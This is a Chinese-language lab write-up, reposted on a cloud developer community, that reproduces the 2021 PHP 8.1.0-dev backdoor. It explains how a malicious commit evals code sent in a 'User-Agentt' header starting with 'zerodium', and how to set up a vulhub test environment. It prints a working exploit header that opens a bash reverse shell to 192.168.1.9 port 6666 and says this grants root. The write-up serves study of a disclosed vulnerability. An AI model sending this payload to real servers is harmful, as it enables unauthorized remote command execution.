前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >PHP 8.1.0-dev 开发版本后门漏洞复现

PHP 8.1.0-dev 开发版本后门漏洞复现

作者头像
亿人安全
发布2022-06-30 15:03:59
9490
发布2022-06-30 15:03:59
举报
文章被收录于专栏:红蓝对抗

漏洞背景

PHP(Hypertext Preprocessor)即“超文本预处理器”,是在服务器端执行的脚本语言,尤其适用于Web开发并可嵌入HTML中。PHP语法利用了C、Java和Perl,该语言的主要目标是让web开发人员快速编写动态网页。前段时间,监测到PHP官方发布通告称,有人入侵了PHP编程语言的官方Git服务器,并提交了包含后门文件的更新包。

漏洞原理

该事件是黑客利用具有git权限的账户提交了一个恶意commit,给PHP源码的zlib扩展增加了一个后门。如果该行由PHP驱动的网站运行,则将允许未经授权的访问者执行他们选择的代码。当发现请求特殊的HTTP头部中包含字符串zerodium时,则用eval执行User-Agent第8位字符后内容。利用该后门,攻击者可以执行任意命令,对于任何使用了存在后门PHP的服务器来说都有巨大的风险和威胁。

漏洞类型

远程代码执行

严重等级

高危

环境搭建

代码语言:javascript
复制
cd vulhub-master/php/8.1-backdoor
docker-compose up -d

漏洞复现

访问页面

使用Burpsuite抓取数据包

添加请求头

代码语言:javascript
复制
User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/192.168.1.9/6666 0>&1'");

开启监听

发送数据包,反弹shell,获得root权限

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-07-31,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 亿人安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞背景
  • 漏洞原理
  • 环境搭建
  • 漏洞复现
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档